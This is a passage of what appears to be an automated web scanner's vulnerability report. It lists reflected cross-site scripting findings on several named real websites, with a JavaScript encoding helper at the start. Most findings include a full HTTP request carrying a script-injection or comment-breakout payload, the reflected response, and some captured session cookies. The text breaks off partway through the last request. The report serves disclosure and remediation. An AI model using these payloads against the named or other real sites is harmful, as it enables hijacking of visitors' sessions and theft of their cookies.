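    else out += '\\u' + s.charCodeAt(i).toString(16).padStart(4, '0');
  }
  return out + '"';
}

// Serialises a flat params object into an object literal, encoding the keys
// too. The 3.66/3.72 responses escape "=" in values (refurl ends in \u003d1)
// yet emit the parameter name raw, which is exactly the gap the scanner used.
function jsObjectLiteral(params) {
  return '{' + Object.keys(params)
    .map(k => jsStringLiteral(k) + ':' + jsStringLiteral(params[k]))
    .join(',') + '}';
}

// A serialised fragment can go into a <script> body only if no "<" or ">"
// survives (so no "</script>") and no raw line terminator can split a
// statement; everything the encoder emits passes this check.
function scriptSafe(fragment) {
  return !/[<>\u2028\u2029\n\r]/.test(fragment);
}

// Constructed inputs, taken from the report's own payloads.
const PAGE_QUERY = "ipid=26443&d4ad8'-alert(1)-'ecc7883e0c=1";              // 3.68
const CLOSE_TAG = '66f9b</script><script>alert(1)</script>bbeb208fd95=1';   // 3.73
const PARAMS = {                                                            // 3.66
  'cff44"-alert(1)-"2e3ab260276': '1',
  jscallback: '$iTXT.js.callback0',
};
```

Because the output uses only double quotes and \uXXXX escapes, it is simultaneously a valid JSON string, so JSON.parse round-trips it; that is a convenient way to unit-test an encoder of this kind without evaluating JavaScript.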

Request

GET /?66f9b</script><script>alert(1)</script>bbeb208fd95=1 HTTP/1.1
Host: virtacore.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 03:22:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11130808;expires=Sun, 10-Feb-2041 03:22:08 GMT;path=/
Set-Cookie: CFTOKEN=43832625;expires=Sun, 10-Feb-2041 03:22:08 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Virtacore Home- Cloud H
...[SNIP]...
<!--
           _uacct='UA-19578445-1';redux.load({uid:'11130808-43832625',history:true, tid:2, tmpid:1, url:'index.cfm', sid:15, query:'66f9b</script><script>alert(1)</script>bbeb208fd95=1', name:'index',title:'Virtacore Home- Cloud Hosting | Cloud Servers | Managed Cloud Hosting | Managed Cloud Servers | Virtualization',"resource":[{"type":"CSS","title":"template1CSS","id":"template1
...[SNIP]...

3.74. http://virtacore.com/vcloud_express.cfm [rxtype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://virtacore.com
Path:   /vcloud_express.cfm

Issue detail

The value of the rxtype request parameter is copied into the HTML document as plain text between tags. The payload dc41d<script>alert(1)</script>cc8d1806ffc was submitted in the rxtype parameter. This input was echoed unmodified in the application's response. The response is the body of an XMLHttpRequest (the request carries X-Requested-With: XMLHttpRequest): a JavaScript object literal whose onload handler hands an HTML error message, with the request URL appended, to oModeless('error', ...). The reflected value therefore sits inside a single-quoted JavaScript string of HTML that the page presumably writes into the DOM, and because the response is served as text/html, opening the URL directly renders the injected <script> element as ordinary markup as well.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vcloud_express.cfm?rxtype=dc41d<script>alert(1)</script>cc8d1806ffc&ts=1297999477134-11130790-98617796 HTTP/1.1
Host: virtacore.com
Proxy-Connection: keep-alive
Referer: http://virtacore.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22208188.27686095.1297999341.1297999341.1297999341.1; __utmb=22208188; __utmc=22208188; __utmz=22208188.1297999341.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=11130852; CFTOKEN=57982461

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 03:24:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


   {history:false, tid:1, sid:0, title:'Page Error',onload:function(){oModeless('error','<h1 class=title>We apologize, however there was an error with your request.</h1>/vcloud_express.cfm?rxtype=dc41d<script>alert(1)</script>cc8d1806ffc&ts=1297999477134-11130790-98617796 <style>
...[SNIP]...

3.75. http://www.internet.com/developer [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internet.com
Path:   /developer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d7d7<script>alert(1)</script>a487c4b6236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed with its letters folded to upper case, as 2D7D7<SCRIPT>ALERT(1)</SCRIPT>A487C4B6236, inside a ColdFusion cfdump table on a 500 Internal Server Error page.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary HTML into the application's response. JavaScript is case-sensitive, so the uppercased ALERT(1) shown here would not run as echoed; HTML tag and attribute names are case-insensitive, however, so script whose body survives the folding (for example an event-handler attribute written entirely in numeric character references, which the HTML parser decodes after the server has upper-cased the text) still executes. The cfdump output is a problem in its own right: a server error page that dumps request structures to any visitor who triggers it.

Request

GET /developer?2d7d7<script>alert(1)</script>a487c4b6236=1 HTTP/1.1
Host: www.internet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Set-Cookie: CFID=72104; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:04 GMT; Path=/
Set-Cookie: CFTOKEN=C72D2539-C7D0-457F-8FA9FC8F9D95FC94; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:04 GMT; Path=/
Content-Type: text/html;charset=utf-8
Date: Fri, 18 Feb 2011 14:58:03 GMT
Connection: close


                                                                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
...[SNIP]...
<td class='cfdump_td_struct'>2D7D7<SCRIPT>ALERT(1)</SCRIPT>A487C4B6236</td>
...[SNIP]...

3.76. http://www.intranetjournal.com/ [c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The value of the c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 request parameter is copied into an HTML comment. The payload 5d31c--><script>alert(1)</script>5c6cf7ebb2d was submitted in the c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter. This input was echoed unmodified in the application's response. The parameter name is itself the payload used in 3.77 (the scanner kept the URL it had already built), and the sink is the same one: the full request URL written into the ad-slot debug comment. The two findings are one issue reachable through both the parameter name and its value.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. Character references are not decoded inside comments, so encoding > (along with < and &) before writing the URL guarantees that --> can never appear; better still, debug comments carrying request data should not be emitted in production output at all.

Request

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=15d31c--><script>alert(1)</script>5c6cf7ebb2d HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:23:51 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:24:51 GMT
Content-Type: text/html
Content-Length: 149706


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.intranetjournal.com with position M0
url: /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=15d31c--><script>alert(1)</script>5c6cf7ebb2d -->
...[SNIP]...

3.77. http://www.intranetjournal.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c5d85--><script>alert(1)</script>177b53bcb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. Encode > (and < and &) before writing the URL into the comment so that --> cannot appear, or drop the debug comment from production output.

Request

GET /?c5d85--><script>alert(1)</script>177b53bcb4=1 HTTP/1.1
Host: www.intranetjournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:54:37 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:55:37 GMT
Connection: close
Content-Type: text/html
Content-Length: 149165


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.intranetjournal.com with position M0
url: /?c5d85--><script>alert(1)</script>177b53bcb4=1 -->
...[SNIP]...

3.78. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /about/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload fd8e5--><script>alert(1)</script>d97a1fbd30c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. Encode > (and < and &) before writing the URL into the comment so that --> cannot appear, or drop the debug comment from production output.

Request

GET /about/sitemap.html?fd8e5--><script>alert(1)</script>d97a1fbd30c=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:06 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:06 GMT
Connection: close
Content-Type: text/html
Content-Length: 66636


<HTML>
<HEAD>
<TITLE>ISP-Planet - Welcome</TITLE>
<META name="description" content="ISP-Planet has business and marketing advice for ISPs, plus specialized isp information resources. It reports on IS
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /about/sitemap.html?fd8e5--><script>alert(1)</script>d97a1fbd30c=1 -->
...[SNIP]...

3.79. http://www.isp-planet.com/business/associations/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /business/associations/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f2f36--><script>alert(1)</script>ba42ff8b252 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /business/associations/index.html?f2f36--><script>alert(1)</script>ba42ff8b252=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:42 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:42 GMT
Connection: close
Content-Type: text/html
Content-Length: 52755

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Business - Directory of ISP Associations</title>
<meta n
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /business/associations/index.html?f2f36--><script>alert(1)</script>ba42ff8b252=1 -->
...[SNIP]...

3.80. http://www.isp-planet.com/fixed_wireless/equipment/distributors/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /fixed_wireless/equipment/distributors/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1f2ae--><script>alert(1)</script>0c6527430b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /fixed_wireless/equipment/distributors/index.html?1f2ae--><script>alert(1)</script>0c6527430b4=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:48 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:48 GMT
Connection: close
Content-Type: text/html
Content-Length: 56277

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<title>ISP-Planet - ISP Planet - Fixed Wireless - Equipment - Wireless Equip
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /fixed_wireless/equipment/distributors/index.html?1f2ae--><script>alert(1)</script>0c6527430b4=1 -->
...[SNIP]...

3.81. http://www.isp-planet.com/investor/brokers/chart.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /investor/brokers/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 75d25--><script>alert(1)</script>7fdd3a7eb68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /investor/brokers/chart.html?75d25--><script>alert(1)</script>7fdd3a7eb68=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:45 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:45 GMT
Connection: close
Content-Type: text/html
Content-Length: 59793

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Investor - ISP Broker Quick Reference Chart</title>
<met
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /investor/brokers/chart.html?75d25--><script>alert(1)</script>7fdd3a7eb68=1 -->
...[SNIP]...

3.82. http://www.isp-planet.com/investor/brokers/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /investor/brokers/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c2b47--><script>alert(1)</script>3adb9c78876 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /investor/brokers/index.html?c2b47--><script>alert(1)</script>3adb9c78876=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:51 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 48459

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Investor - ISP Broker Directory</title>
<meta name="chan
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /investor/brokers/index.html?c2b47--><script>alert(1)</script>3adb9c78876=1 -->
...[SNIP]...

3.83. http://www.isp-planet.com/marketing/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /marketing/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e040c--><script>alert(1)</script>71b19238b7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /marketing/index.html?e040c--><script>alert(1)</script>71b19238b7e=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:44 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:44 GMT
Connection: close
Content-Type: text/html
Content-Length: 66631

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - ISP-Marketing</TITLE>
<META NAME="description" CONT
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /marketing/index.html?e040c--><script>alert(1)</script>71b19238b7e=1 -->
...[SNIP]...

3.84. http://www.isp-planet.com/quotes/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /quotes/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 78fc3--><script>alert(1)</script>7dcbdb41c54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /quotes/index.html?78fc3--><script>alert(1)</script>7dcbdb41c54=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:50 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:50 GMT
Connection: close
Content-Type: text/html
Content-Length: 92060

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Notable Quotes</TITLE>
<META NAME="description" CON
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /quotes/index.html?78fc3--><script>alert(1)</script>7dcbdb41c54=1 -->
...[SNIP]...

3.85. http://www.isp-planet.com/resources/backbones/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /resources/backbones/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 629b3--><script>alert(1)</script>75e20150d24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /resources/backbones/index.html?629b3--><script>alert(1)</script>75e20150d24=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:41 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:41 GMT
Connection: close
Content-Type: text/html
Content-Length: 39562

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP Planet - Resources - Backbone Directory: An ISP Guide to National
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/backbones/index.html?629b3--><script>alert(1)</script>75e20150d24=1 -->
...[SNIP]...

3.86. http://www.isp-planet.com/resources/directories/state_puc.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /resources/directories/state_puc.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bcad3--><script>alert(1)</script>5f359aca2e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /resources/directories/state_puc.html?bcad3--><script>alert(1)</script>5f359aca2e4=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
